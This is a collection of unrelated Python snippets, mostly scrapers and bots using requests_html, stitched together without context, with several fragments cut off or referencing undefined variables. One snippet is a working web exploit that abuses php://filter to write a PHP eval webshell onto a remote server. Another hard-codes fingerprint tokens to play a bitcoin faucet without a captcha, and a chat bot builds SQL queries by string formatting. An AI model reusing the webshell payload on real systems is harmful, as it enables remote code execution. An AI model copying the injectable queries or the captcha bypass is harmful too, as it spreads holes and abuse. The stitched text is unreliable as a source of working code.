payload = { "staff_username": USER, "staff_password": PASSWORD, } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" } # 0) GET - login - https://www.campingshop.pl/panel/auth/login r = sess.get(LOGIN_WEBSITE, headers=headers ) # LOGIN_WEBSITE: http://www.campingshop.pl/panel/auth/login # 1) POST - login - https://www.campingshop.pl/panel/auth/login z staff_username i staff_password r = sess.post(LOGIN_WEBSITE, data=payload, headers=headers) r.html.render( ) # tu chciałam przekazać send_cookies_session=True ale dostaję TypeError: render() got an unexpected keyword argument 'send_cookies_session' # mimo, ze 'send_cookies_session' jest w doc'sach https://requests.readthedocs.io/projects/requests-html/en/latest/ print(r.cookies.get_dict()) # brak ciasteczek ;( # 2) GET - panel - na https://www.campingshop.pl/panel r = sess.get("https://www.campingshop.pl/panel", headers=headers) # 3) GET - login - na https://www.campingshop.pl/panel2/login r = sess.get("https://www.campingshop.pl/panel2/login", headers=headers) r.html.render() print(r.cookies.get_dict()) # brak ciasteczek ;( # Do uzupełnienia
def search(self) -> list: """ Performs actual scraping :return: list with resulting positions """ post_data = { "_piref37_267288_37_267287_267287.next_page": "/vmsearch.do", "_piref37_267288_37_267287_267287.formtype": 3, "_piref37_267288_37_267287_267287.vmid": "", "_piref37_267288_37_267287_267287.nprokoho": "", "_piref37_267288_37_267287_267287.ndny": "", "_piref37_267288_37_267287_267287.nokres": "", "_piref37_267288_37_267287_267287.nsort": "", "_piref37_267288_37_267287_267287.ref": [], "_piref37_267288_37_267287_267287.kiosek": 0, "_piref37_267288_37_267287_267287.send": 'A', "_piref37_267288_37_267287_267287.ok": "Search", "_piref37_267288_37_267287_267287.profese": [self.profession], # 'developer' "_piref37_267288_37_267287_267287.obor": "", "_piref37_267288_37_267287_267287.dopravaObec": "", "_piref37_267288_37_267287_267287.firma": "", "_piref37_267288_37_267287_267287.ico": "", "_piref37_267288_37_267287_267287.okres": self.district_code, "_piref37_267288_37_267287_267287.zaDny": "", "_piref37_267288_37_267287_267287.mzdaOd": "", "_piref37_267288_37_267287_267287.typMzdy": 'M', "_piref37_267288_37_267287_267287.sort": 2 } cleanr = re.compile(r'<.*?>') session = HTMLSession() response = session.post(self.url, data=post_data) tree = html.fromstring(response.text) position_elements = tree.cssselect('table.OKtbodyThDistinct tbody') for position_element in position_elements: # get details from lines using regex match position = {} occupation = position_element.cssselect('h4.vmProfese')[0].text position['occupation'] = occupation info_lines = position_element.cssselect('tr') for info_line in info_lines: if('Company' in str(html.tostring(info_line))): company_list = info_line.cssselect('b') company = '' if (len(company_list)): company = company_list[0].text position['company'] = company elif('Report to' in str(html.tostring(info_line))): reportto_element = info_line.cssselect('td')[2] reportto_str = str(html.tostring(reportto_element, encoding='unicode')) report_to = re.sub(cleanr, '', reportto_str) position['report_to'] = report_to elif('Comment on vacancy:' in str(html.tostring(info_line))): description_element = info_line.cssselect('td')[0] description_str = str(html.tostring(description_element, encoding='unicode')) description = re.sub(cleanr, '', description_str) position['description'] = description # print(f'company: {company}') # print(company.text) self.positions.append(position) # print(self.positions) return self.positions
from requests_html import HTMLSession import json session = HTMLSession() r = session.get("https://cervezapedia.com/beer/rate") token = r.cookies["XSRF-TOKEN"] print(token) r = session.post("https://cervezapedia.com/beer/rate", headers={"X-XSRF-TOKEN": token}) datos = json.loads(r.content) #print(datos) for cerveza in datos["data"]: print("-------------------------------------------------------") print("Código:", cerveza['externalId'], "Nombre:", cerveza['name']) r = session.post("https://cervezapedia.com/beer/byId", headers={"X-XSRF-TOKEN": token}, json={"id": cerveza['externalId']}) datos_cerveza = json.loads(r.content)["data"] #print(datos_cerveza) print("Pais: ", datos_cerveza["countrySpanishName"]) print("Alcohol: ", datos_cerveza["alcohol"]) print("Estilo: ", datos_cerveza["styleName"])
def check_pages(vk, config): # авторизация url = 'https://catwar.su/ajax/login' user_agent_val = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \ 'Chrome/90.0.4430.93 Safari/537.36 ' session = HTMLSession() session.headers.update({'Referer': url}) session.headers.update({'User-Agent': user_agent_val}) session.post(url, {**catwar}) heads = ('врачеватель', 'врачевательница', 'ученик врачевателя', 'ученица врачевателя', 'советник', 'советница') elders = ('старейшина') elects = ('избранник духов', 'избранница духов') guards = ('страж', 'стражница') hunters = ('охотник', 'охотница') futures = ('будущий охотник', 'будущая охотница', 'будущий страж', 'будущая стражница') others = ('котёнок', 'переходящий', 'переходящая') page_ids = {heads: 56490990, elders: 56591896, elects: 56846221, guards: 56807806, hunters: 56807807, futures: 56490171, others: 56808867} wrong_names, dels, not_position = [], [], [] m_1, m_2, m_3 = '', '', '' for key, value in page_ids.items(): # получаем данные со страницы orig_page = vk_token.pages.get(**config, owner_id=-group_id, page_id=value, need_source=1) orig_page = orig_page['source'] page = orig_page[(orig_page.find("{|") + 2):(orig_page.find("|}"))] vk_ids = re.findall("id[0-9]+", page) i = 0 while i < len(vk_ids): vk_ids[i] = vk_ids[i][2:] i += 1 vk_names = re.findall("\|[^ -][^0-9\]\]\[]+", page) i = 0 while i < len(vk_names): vk_names[i] = vk_names[i][1:] i += 1 vk_dict = dict(zip(vk_ids, vk_names)) ids = re.findall("\|[0-9]+", page) i = 0 while i < len(ids): ids[i] = ids[i][1:] i += 1 names = re.findall("\[[А-яё ]+", page) i = 0 while i < len(names): names[i] = names[i][1:] i += 1 # проверка вкшных имён for vk_key, vk_value in vk_dict.items(): vk_name = vk.users.get(user_ids=vk_key, fields='first_name, last_name')[0] vk_name = vk_name['first_name'] + ' ' + vk_name['last_name'] if vk_value != vk_name: wrong_names.append(f'{vk_value} — {vk_name}') # проверка на нахождение в клане и должности for id in ids: response = session.get(f'https://catwar.su/cat{id}') profile = response.content.decode("utf-8") soup = BeautifulSoup(profile, 'html.parser') position = soup.find('i') if not position: if id != 539719 or id != 1068731: dels.append(f'{key[0]} — {id}') else: position = position.text position = re.match('[^i<>/]+', position).group() if position.lower() not in key: not_position.append(f'{id} не {key[0]}, a {position}') for x in dels: m_1 = m_1 + x + '\n' for x in not_position: m_2 = m_2 + x + '\n' for x in wrong_names: m_3 = m_3 + x + '\n' vk.messages.send(**config, random_id=get_random_id(), user_id=editor, message=f'Удалены или не в клане: {m_1}\n\n' ) vk.messages.send(**config, random_id=get_random_id(), user_id=editor, message=f'Другие должности: {m_2}\n\n' ) vk.messages.send(**config, random_id=get_random_id(), user_id=editor, message=f'Другие имена: {m_3}\n\n', )
# https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/ import pprint from requests_html import HTMLSession url = 'http://www.cduestc.cn:50007/' params = {"file": 'php://filter/write=convert.base%364-decode/resource=aa.php'} data = { # <?php @eval($_POST['cmd']) ?> 写到aa.php # <?php exit(); 前面加1个a # <?php die(); 前面加2个aa 'contents': 'aaPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=' } # proxies = {'http': 'http://localhost:8080'} proxies = {} s = HTMLSession() res = s.post(url, params=params, data=data, proxies=proxies) pprint.pprint(res.text)
class LostFilmParser: source_url = 'https://www.lostfilm.tv/' tv_shows_list_part_url = 'https://www.lostfilm.tv/ajaxik.php' part_step = 10 def __init__(self): self.session = HTMLSession() self.news_data = self.session.get(self.source_url) def get_links(self): return self.news_data.html.links def get_title_en(self, href): try: result = search(r'/series/([^/]+)/', href) title_en = result.group(1) tv_show_link = self.source_url.rstrip('/') + result.group() except AttributeError: title_en = None tv_show_link = None return title_en, tv_show_link def get_new_shows_episodes(self): clear_data = [] news_block = self.news_data.html.find('.new-movies-block', first=True) movies = news_block.find('a.new-movie') for movie in movies: title_en, show_link = self.get_title_en(movie.attrs['href']) clear_data.append( { 'title_ru': movie.attrs['title'], 'title_en': title_en, 'jpg': 'http:' + movie.find('img', first=True).attrs['src'], 'season': movie.find('.title', first=True).text, 'date': movie.find('.date', first=True).text, 'episode_link': self.source_url.rstrip('/') + movie.attrs['href'], 'tv_show_link': show_link, } ) return clear_data def load_part_list(self, step): url = self.source_url + 'ajaxik.php' request_data = self.session.post( url=url, data={'act': 'serial', 'o': step, 's': 3, 't': 0, 'type': 'search'} ) return json.loads(request_data.content)['data'] def get_tv_shows_list(self): """10->20->30-> пока не вернет пустой список""" step = 0 shows_list = [] request_result = self.load_part_list(step) while request_result: for result in request_result: shows_list.append(result) step += self.part_step sleep(1) request_result = self.load_part_list(step) return shows_list
class Grabber: def __init__(self, d, f, t, p): self.date = d self.from_ = f self.to = t self.purpose_code = p self.s = HTMLSession() self.s.cookies = self.init_cookie() self.uuid = '' self.ticket = {} def init_cookie(self): cookie_jar = RequestsCookieJar() cookie_jar.set("route", "c5c62a339e7744272a54643b3be5bf64", domain="/") cookie_jar.set("JSESSIONID", "772931B953A48C762D39F27832447D2F", domain="/otn") cookie_jar.set("BIGipServerotn", "217055754.38945.0000", domain="/") return cookie_jar def check_tickect_info(self): def crawl_ticket_info(): url = ( f'https://kyfw.12306.cn/otn/leftTicket/queryZ?' f'leftTicketDTO.train_date={self.date}' f'&leftTicketDTO.from_station={self.from_}' f'&leftTicketDTO.to_station={self.to}&purpose_codes={self.purpose_code}' ) r = self.s.get(url) tickets = [] for line in r.json()['data']['result']: ls = line.split('|') if ls[0]: tickets.append({ 'secretstr': ls[0], 'train_num': ls[3], 'train_date': ls[13], 'start_at': ls[8], 'arrive_at': ls[9], 'seat_level_0': ls[32], 'seat_level_1': ls[31], 'seat_level_2': ls[30], 'sleeper_level_0': ls[21], 'sleeper_level_1': ls[23], 'motor_sleeper': ls[33], 'sleeper_level_2': ls[28], 'soft_seat': ls[27], 'hard_seat': ls[29], 'no_seat': ls[26] }) return tickets tickets = crawl_ticket_info() if not tickets: return for ticket in tickets: if ticket['train_num'] == 'G1002': self.order_ticket(ticket) return def submit_order_request(self, ticket): url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest' data = { 'secretStr': urllib.parse.unquote(ticket['secretstr']), 'train_date': dt.datetime.strptime(ticket['train_date'], '%Y%m%d').strftime('%Y-%m-%d'), 'back_train_date': dt.datetime.today().strftime('%Y-%m-%d'), 'tour_flag': 'dc', 'purpose_codes': self.purpose_code, 'query_from_station_name': sd[self.from_], 'query_to_station_name': sd[self.to], 'undefined': '' } r = self.s.post(url, data=data) def get_data(self): def parse_pts(html): tds = html.xpath('//tbody[@id="check_ticketInfo_id"]/tr/td') return f'0,0,1,{tds[3].text},1,{tds[5].text},{tds[6].text},N', f'{tds[3].text},1,{tds[5].text},1_' url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc' headers = { 'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init?linktypeid=dc', 'Host': 'kyfw.12306.cn', 'Origin': 'https://kyfw.12306.cn', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'application/x-www-form-urlencoded' } r = self.s.post(url, data={'_json_att': ''}, headers=headers) r.html.render(timeout=6, wait=6) # print(r.text) # TODO: optimized print(r.text) html = lxml.etree.HTML(r.text) passenger_ticket_str, old_passenger_str = parse_pts(html) return { 'REPEAT_SUBMIT_TOKEN': re.findall(r'var globalRepeatSubmitToken = \'(.*)\';', rt)[0], 'key_check_isChange': re.findall(r'\'key_check_isChange\':\'(.*)\',', rt)[0], 'leftTicketStr': re.findall(r'\'leftTicketStr\':\'(.*)\',', rt)[0], '_json_att': '', 'dwAll': 'N', 'roomType': '00', 'whatsSelect': '1', 'seatDetailType': '000', 'choose_seats': '', # TODO: choose seat. 'train_location': 'QX', # cant understand. 'purpose_codes': '00', 'randCode': '', 'passengerTicketStr': passenger_ticket_str, 'oldPassengerStr': old_passenger_str, } def order_ticket(self, ticket): self.submit_order_request(ticket) # checkuser data = self.get_data() url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue' r = self.s.post(url, data=data) try: if r.status_code == 200: print('got !') except: import traceback traceback.print_exc() def show_qr_code(self): """Show qrcode for login.""" url = 'https://kyfw.12306.cn/otn/resources/login.html' self.s.get(url) rjs = self.s.post('https://kyfw.12306.cn/passport/web/create-qr64', data={ 'appid': 'otn' }).json() self.uuid = rjs['uuid'] b64img = rjs['image'] img = Image.open(BytesIO(base64.b64decode(b64img))) img.show() def check_qr_code(self): rjs = self.s.post('https://kyfw.12306.cn/passport/web/checkqr', data={ 'appid': 'otn', 'uuid': self.uuid }).json() return rjs['result_code'] != '2' def login(self): threading.Thread(target=self.show_qr_code).start() while self.check_qr_code(): time.sleep(2) print('login success.')
class ScrapperINMET: def __init__(self): env_path = os.path.join(os.path.dirname(__file__), '..', 'env.ini') env_config = configparser.ConfigParser() env_config.read(env_path) self.user = env_config.get('login', 'user') self.password = env_config.get('login', 'password') self.base_url = "http://www.inmet.gov.br" self.session = HTMLSession(mock_browser=True) @staticmethod def is_logged_in(response: Response) -> bool: return 'Modulo de Estudo e Pesquisa' in response.text def login(self) -> bool: url = '/'.join([self.base_url, "projetos/rede/pesquisa/inicio.php"]) self.session.get(url) payload = { 'mUsuario': '', 'mSenha': self.password, 'mCod': self.user, 'mGerModulo': 'PES', 'btnProcesso': ' Acessar ' } response = self.session.post(url, data=payload) response.raise_for_status() return self.is_logged_in(response) def get_dados(self, tipo_periodo: str, uf: str, cidade: str, dtInicio: datetime.datetime, dtFim: datetime.datetime): self.login() if tipo_periodo == 'mes': url = '/'.join([ self.base_url, "projetos/rede/pesquisa/form_mapas_mensal.php" ]) url_post = '/'.join( [self.base_url, "projetos/rede/pesquisa/mapas_mensal_sem.php"]) elif tipo_periodo == 'dia': url = '/'.join([ self.base_url, "projetos/rede/pesquisa/form_mapas_c_diario.php" ]) url_post = '/'.join( [self.base_url, "projetos/rede/pesquisa/mapas_c_diario.php"]) else: raise NotImplementedError self.session.get(url) payload = { 'mUsuario': self.user, 'mRelRegiao': '', 'mRelEstado': uf.upper(), 'mRelDtInicio': dtInicio.strftime('%d/%m/%Y'), 'mRelDtFim': dtFim.strftime('%d/%m/%Y'), 'mGerModulo': 'PES', 'mOpcaoAtrib15': '1', 'btnProcesso': ' Pesquisa ' } response = self.session.post(url_post, data=payload) pattern = cidade + '.*href=([^\>]+) target' url_result = re.search(pattern, response.text, flags=re.IGNORECASE).group(1) response = self.session.get(url_result) rtext = response.html.xpath('.//pre')[0].full_text dados = re.search('(estacao;.+)', rtext, re.IGNORECASE | re.DOTALL).group(1) dados = dados.split('\n') head = dados[0].split(';') dados.pop(0) result = list() for dado in dados: values = dado.split(';') if len(values) != len(head): continue temp = dict() for k, v in zip(head, values): if k + v == "": continue temp[k] = v result.append(temp) return result
class GratisDNS(object): BACKEND_URL = 'https://admin.gratisdns.com/' SUPPORTED_RECORDS = ('A', 'AAAA', 'CNAME', 'MX', 'TXT', 'SRV') def __init__(self, username: str, password: str): self.__session = HTMLSession() payload = { 'action': 'logmein', 'login': username, 'password': password } response = self.__session.post(GratisDNS.BACKEND_URL, data=payload, allow_redirects=False) if response.status_code != requests.codes.found: # Unfortunately, GratisDNS doesn't user proper HTTP status # codes, but does use a redirect on successfull login, so # assume anything else is an error. raise GratisDNSError( 'Login response was not redirect. Possibly invalid username/password' ) def __get_domains(self, action: str, table_id: str) -> list: domains = [] response = self.__session.get(GratisDNS.BACKEND_URL, params={'action': action}) table = response.html.find(table_id, first=True) for domain in table.find('tr'): domain_change_link = domain.find('a', containing='Ændre', first=True) if domain_change_link: href = domain_change_link.attrs['href'] query = parse_qs(urlparse(href).query) domains.append(query['user_domain'][0]) return domains def __record_from_dict(self, record_type: str, record_entries: dict) -> Record: if record_type == 'A': return ARecord(record_entries.get('user_domain'), record_entries['Hostname'], record_entries['IPv4'], id=record_entries.get('id'), ttl=record_entries['TTL']) elif record_type == 'AAAA': return AAAARecord(record_entries.get('user_domain'), record_entries['Hostname'], record_entries['IPv6'], id=record_entries.get('id'), ttl=record_entries['TTL']) elif record_type == 'CNAME': raise NotImplementedError() elif record_type == 'MX': return MXRecord(record_entries.get('user_domain'), record_entries['Hostname'], record_entries['Exchanger'], record_entries['Preference'], id=record_entries.get('id'), ttl=record_entries['TTL']) elif record_type == 'TXT': return TXTRecord(record_entries.get('user_domain'), record_entries['Hostname'], record_entries['Text'], id=record_entries.get('id'), ttl=record_entries['TTL']) elif record_type == 'SRV': raise NotImplementedError() raise NotImplementedError() def __record_change_query_from_column(self, column) -> dict: record_change_link = column.find('a', containing='Ændre', first=True) if record_change_link: href = record_change_link.attrs['href'] query = parse_qs(urlparse(href).query) return {k: v[0] for k, v in query.items()} return {} def __get_records(self, html: HTML) -> dict: records = {} for entry in html.find('.dns-records'): record_type = entry.find('h2', first=True).element.text.strip() if record_type not in self.SUPPORTED_RECORDS: continue table = entry.find('table', first=True) headers = [ h.text for h in table.find('thead', first=True).find( 'tr', first=True).find('th') ] record_entries = [] for row in table.find('tbody', first=True).find('tr'): cols = row.find('td') entry = {} for i, h in enumerate(headers): column = cols[i] if h: entry[h] = column.text else: record_change_link_query = self.__record_change_query_from_column( column) if record_change_link_query: entry['id'] = record_change_link_query['id'] entry['user_domain'] = record_change_link_query[ 'user_domain'] if entry: record_entries.append( self.__record_from_dict(record_type, entry)) if record_entries: records[record_type] = record_entries return records def create_record(self, domain, host, type, data, preference=None, weight=None, port=None): raise NotImplementedError() def update_record(self, record: Record): if record.record_type not in self.SUPPORTED_RECORDS: raise NotImplementedError() form_data = vars(record) form_data[ 'action'] = f'dns_primary_record_update_{record.record_type.lower()}' self.__session.post(GratisDNS.BACKEND_URL, data=form_data) def delete_record(self, domain, host, type=None, preference=None): raise NotImplementedError() def get_primary_domains(self): return self.__get_domains('dns_primarydns', '#primarydnslist') def get_secondary_domains(self): return self.__get_domains('dns_secondarydns', '#secondarydnslist') def get_primary_domain_details(self, domain: str): response = self.__session.get(GratisDNS.BACKEND_URL, params={ 'action': 'dns_primary_changeDNSsetup', 'user_domain': domain }) return self.__get_records(response.html) def create_primary_domain(self, domain): raise NotImplementedError() def create_secondary_domain(self, domain, master, slave='xxx.xxx.xxx.xxx'): raise NotImplementedError() def delete_primary_domain(self, domain): raise NotImplementedError() def delete_secondary_domain(self, domain): raise NotImplementedError() def import_from_axfr(self, domain, slave='127.0.0.1'): raise NotImplementedError()
def start(data): session = HTMLSession() url = "https://parivahan.gov.in/rcdlstatus/?pur_cd=101" res = session.get(url) # ----------------FORM EXTRACTION---------------- soup = BeautifulSoup(res.html.html, "html.parser") details = {} form = soup.find_all("form")[0] action = form.attrs.get("action").lower() method = form.attrs.get("method", "get").lower() inputs = [] for input_tag in form.find_all("input"): input_type = input_tag.attrs.get("type", "text") input_name = input_tag.attrs.get("name") input_value = input_tag.attrs.get("value", "") inputs.append({ "type": input_type, "name": input_name, "value": input_value }) details["action"] = action details["method"] = method details["inputs"] = inputs # -------------------Captcha--------------------- captcha_src = soup.find_all("img") for i in captcha_src: if "Captcha" in i['src']: captcha_url = "https://parivahan.gov.in/" + i['src'] print(captcha_url ) # Currently Captcha is taking by user input by visiting the link # -------------------FORM FILLING----------------- data['form_rcdl:j_idt32:CaptchaID'] = input("Enter Captcha: ") submit_url = urljoin(url, details["action"]) #print(submit_url) if details["method"] == "post": res = session.post(submit_url, data=data) # return res elif details["method"] == "get": res = session.get(submit_url, params=data) # return res # ----------Authorization----------- auth_cookie = res.cookies # ---------Data Extract------------- name_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[2]/td[2]' issue_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[2]/text()' expiry_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[3]/text()' vehicle_class_xpath = '//*[@id="form_rcdl:j_idt164_data"]/tr/td[2]' driving_num_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[5]/td[2]' url = 'https://parivahan.gov.in/rcdlstatus/vahan/rcDlHome.xhtml' response = requests.get(url, cookies=auth_cookie) byte_data = response.content source_code = html.fromstring(byte_data) # --------------CSV DUMP---------------------- final_data = [ ["Name"], ["Issue Date"], ["Expiry Date"], ["Vehicle Class"], ] name_list = source_code.xpath(name_xpath) issue_list = source_code.xpath(issue_xpath) expiry_list = source_code.xpath(expiry_xpath) class_list = source_code.xpath(vehicle_class_xpath) driv_num = source_code.xpath(driving_num_xpath) # print(tree[0].text_content()) for i in range(len(name_list)): final_data[0].append(name_list[i].text_content()) final_data[1].append(issue_list[i].text_content()) final_data[2].append(expiry_list[i].text_content()) final_data[3].append(class_list[i].text_content()) final_data[4].append(driv_num[i].text_content()) output_df = pd.DataFrame(final_data) output_df.to_csv("output.csv", index=True)
def download_manga(self, start_link, end_link=""): """given a start link and end link from twistedhelscans.com, downloads all manga images""" next_link = start_link counter = 1 # Deal with end link being first page if end_link.endswith('1'): end_link = end_link[:-6] # Initial page session = HTMLSession() page = session.post(start_link, data=dict(adult="true")) # get title of manga try: title = gen_title(page) except: self.queue.put( "Could not find title. Website is not Twisted Hel Scan page?") return while next_link != end_link: # Open next page page = session.post(next_link, data=dict(adult="true")) # check if end link is first page redirect if page.url == end_link: break self.queue.put(page.url) if not end_link: end_link = page.html.find('h1.hb.dnone', first=True).find( 'a', first=True).attrs['href'] # Find image link and vol. num try: volume = get_volume(page) image = page.html.find('div.inner', first=True).find( 'img', first=True).attrs['src'] except: self.queue.put( "Could not find image link. Website is not Twisted Hel Scan page?" ) return # Download the image image = session.get(image) # Make manga directory if not os.path.exists(title): try: os.mkdir(title) except IOError: self.queue.put("Could not make directory") return # Make volume directory if not os.path.exists(title + "/" + volume): try: os.mkdir(title + "/" + volume) except IOError: self.queue.put("Could not make directory") return counter = 1 # Write image to file self.write_image(image, title, volume, counter) counter += 1 # Find next link next_link = page.html.find('div.inner', first=True).find( 'a', first=True).attrs['href'] self.queue.put("Done")
def onQQMessage(bot, contact, member, content): if not bot.isMe(contact, member): if content == '.help' or '[@ME]' in content: bot.SendTo( contact, '转发【链接】添加红包\n' + '输入【.1】获取红包并垫一手\n' + '输入【.11】获取红包但不垫\n' + '输入【.2】查询剩余个数\n' + '输入【.u1 链接】将链接标记为已使用\n' + '输入【.u0 链接】将链接标记为未使用\n') elif content == '.stop': bot.SendTo(contact, '红包机器人好像关闭不了') # bot.Stop() else: con = sqlite3.connect(DB_NAME) # 目录是qqbot的启动目录 cur = con.cursor() table = 'hb' # SQLite does not have a separate Boolean storage class. # Instead, Boolean values are stored as integers 0 (false) and 1 (true). cur.execute( 'CREATE TABLE IF NOT EXISTS %s (url TEXT PRIMARY KEY, used INTEGER DEFAULT 0)' % table) # if content == '.clrdb': # try: # cur.execute('DELETE FROM %s' % table) # bot.SendTo(contact, '清库成功!') # except Exception as e: # bot.SendTo(contact, '清库失败!异常:' + str(e)) if content.startswith('https://url.cn/') and len(content) == 22: bot.SendTo(contact, content) bot.SendTo(contact, '收到红包链接,处理中...') try: cur.execute('insert into %s values("%s", 0)' % (table, content)) bot.SendTo(contact, '添加成功!') con.commit() except Exception as e: if 'Duplicate' or 'UNIQUE' in str(e): bot.SendTo(contact, '添加失败!这个红包已经有了!') else: bot.SendTo(contact, '添加失败!异常:' + str(e)) con.rollback() elif content == '.1': bot.SendTo(contact, '查询中...') cur.execute('SELECT url FROM %s WHERE used=0' % table) data = cur.fetchone() if data == None: bot.SendTo(contact, '红包已经耗尽了!') else: url = data[0] url_login = '******' headers = \ {'Host': 'api.mtdhb.org', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/x-www-form-urlencoded', 'DNT': '1', 'Connection': 'keep-alive'} browser = HTMLSession() browser.get(url_login, headers=headers) data_login = {'account': ACCOUNT, 'password': PASSWORD} url_login_api = 'https://api.mtdhb.org/user/login' r = browser.post(url_login_api, data=data_login) if r.json()['code'] == 0: bot.SendTo(contact, '登录成功...') url_receive_api = 'https://api.mtdhb.org/user/receiving' data_receive = {'phone': '', 'url': url, 'force': 0} headers['X-User-Token'] = r.json()['data']['token'] r = browser.post(url_receive_api, data=data_receive, headers=headers) if r.json()['code'] == 0: sec = 3 bot.SendTo(contact, '正在垫一手...等待%d秒' % sec) url_number_api = 'https://api.mtdhb.org/user/number' time.sleep(sec) r = browser.get(url_number_api, headers=headers) if r.json()['code'] == 0: bot.SendTo( contact, '剩余次数:%d' % r.json()['data']['ele']['available']) bot.SendTo( contact, '总共次数:%d' % r.json()['data']['ele']['total']) else: bot.SendTo(contact, '获取次数失败!JSON = %s' % r.json()) bot.SendTo(contact, '最佳手气红包链接如下,可以直接领取:') bot.SendTo(contact, url) try: cur.execute( 'UPDATE %s SET used=1 WHERE url = "%s"' % (table, url)) con.commit() cur.execute( 'SELECT count(*) FROM %s WHERE used=0' % table) bot.SendTo(contact, '未使用红包:%d个' % cur.fetchone()[0]) except Exception as e: bot.SendTo(contact, '更新标记失败!\n' + str(e)) con.rollback() else: bot.SendTo(contact, '垫一手失败!JSON = %s' % r.json()) else: bot.SendTo(contact, '登录失败!JSON = %s' % r.json()) elif content == '.11': bot.SendTo(contact, '查询中...') cur.execute('SELECT url FROM %s WHERE used=0' % table) data = cur.fetchone() if data == None: bot.SendTo(contact, '红包已经耗尽了!') else: url = data[0] bot.SendTo(contact, '红包链接如下:') bot.SendTo(contact, url) try: cur.execute('UPDATE %s SET used=1 WHERE url = "%s"' % (table, url)) con.commit() cur.execute('SELECT count(*) FROM %s WHERE used=0' % table) bot.SendTo(contact, '未使用红包:%d个' % cur.fetchone()[0]) except Exception as e: bot.SendTo(contact, '更新标记失败!\n' + str(e)) con.rollback() elif content == '.2': try: cur.execute('SELECT count(*) FROM %s WHERE used=0' % table) bot.SendTo(contact, '未使用红包:%d个' % cur.fetchone()[0]) # cur.fetchone() => Row # cur.fetchone()[0] => Row[Col=0] cur.execute('SELECT count(*) FROM %s' % table) bot.SendTo(contact, '总红包数量:%d个' % cur.fetchone()[0]) except Exception as e: bot.SendTo(contact, '查询失败!异常:' + str(e)) elif content.startswith('.u1 '): url = content.split(' ')[1] if url.startswith('https://url.cn/') and len(url) == 22: try: cur.execute('UPDATE %s SET used=1 WHERE url="%s"' % (table, url)) con.commit() bot.SendTo(contact, '标记成功') except Exception as e: con.rollback() bot.SendTo(contact, '标记异常:' + str(e)) else: bot.SendTo(contact, '链接不正确!') elif content.startswith('.u0 '): url = content.split(' ')[1] if url.startswith('https://url.cn/') and len(url) == 22: try: cur.execute('UPDATE %s SET used=0 WHERE url="%s"' % (table, url)) con.commit() bot.SendTo(contact, '标记成功') except Exception as e: con.rollback() bot.SendTo(contact, '标记异常:' + str(e)) else: bot.SendTo(contact, '链接不正确!') elif content.startswith('.'): bot.SendTo(contact, '未知指令,输入【.help】获取帮助') cur.close() con.close()
class Client: _URL = 'https://freebitco.in' def __init__(self, verify_ssl=True): self._logger = logging.getLogger('root.fbclient_direct') self._session = HTMLSession() self._session.verify = verify_ssl self._cache = defaultdict(lambda: (None, datetime.now(), 5)) def _check_login(func): def wrapper(*args, **kwargs): self = args[0] self._logger.debug('Verifying login') html = self._get_main_page() if html.find('#balance', first=True): return func(*args, **kwargs) self._logger.error('You are not logged in') raise LoginError('Not logged in') return wrapper def login(self, username, password, otc=None): self._logger.info(f'Logging in, user: {username}') if not username: self._logger.error('Username required') raise ValueError('Username required') elif not password: self._logger.error('Password required') raise ValueError('Password required') login_page = self._session.get(f'{self._URL}/?op=signup_page') csrf = login_page.cookies['csrf_token'] self._session.headers['x-csrf-token'] = csrf data = (f'csrf_token={quote(csrf)}' f'&op=login_new' f'&btc_address={quote(username)}' f'&password={quote(password)}') if otc: data += f'&tfa_code={otc}' response = self._session.post(self._URL, data) result = response.text.split(':') if result[0] == 's': self._logger.info('Login success') self._session.cookies['btc_address'] = result[1] self._session.cookies['password'] = result[2] self._session.cookies['have_account'] = '1' elif result[0] == 'e': raise LoginError(f'Login failed: {result[1]}') else: raise LoginError(f'Login failed: {response}') @_check_login def activate_rp_bonus(self, amount=100): return self._activate_bonus(_RewardType.Points, amount) @_check_login def activate_lottery_bonus(self, amount=100): return self._activate_bonus(_RewardType.Lottery, amount) @_check_login def activate_btc_bonus(self, amount=1000): return self._activate_bonus(_RewardType.FreeBTC, amount) @_check_login def roll(self, play_without_captcha=False): self._logger.info('Rolling') login_page = self._session.get(f'{self._URL}') data = (f'csrf_token={self._session.headers["x-csrf-token"]}' f"&op=free_play" f"&fingerprint=43b0ec50d04dfcf473f26b8fa7c8f72f" f"&client_seed={self._get_roll_seed()}" f"&fingerprint2=2592886125" f"&pwc={int(play_without_captcha)}" f"&89591411d5cf=1567309413%3A26e9b826a33e321aa27c09d235c158ff18de7f48ce850838ffe7f669cc30b436" f"&d4202f82cc23=1b208b3be22da3a07e58deb40fbecc0ef43b43b3216b8c2cc9ba7bc28646c21e") response = self._session.post(self._URL, data) result = response.text.split(':') if result[0] == 's': self._logger.info(f'Roll success, number: {result[1]}, win: {result[3]} BTC, balance: {result[2]} BTC') return True elif result[0] == 'e': self._logger.error(f'Roll failed: {result[1]}') else: self._logger.error(f'Roll failed: {response.text}') return False @_check_login def get_roll_timer(self): self._logger.info('Retrieving roll timer') html = self._get_main_page() time_remaining_pattern = re.compile("\$\('#time_remaining'\).countdown\({until: \+(\d+)") match = time_remaining_pattern.search(html.html) if not match: 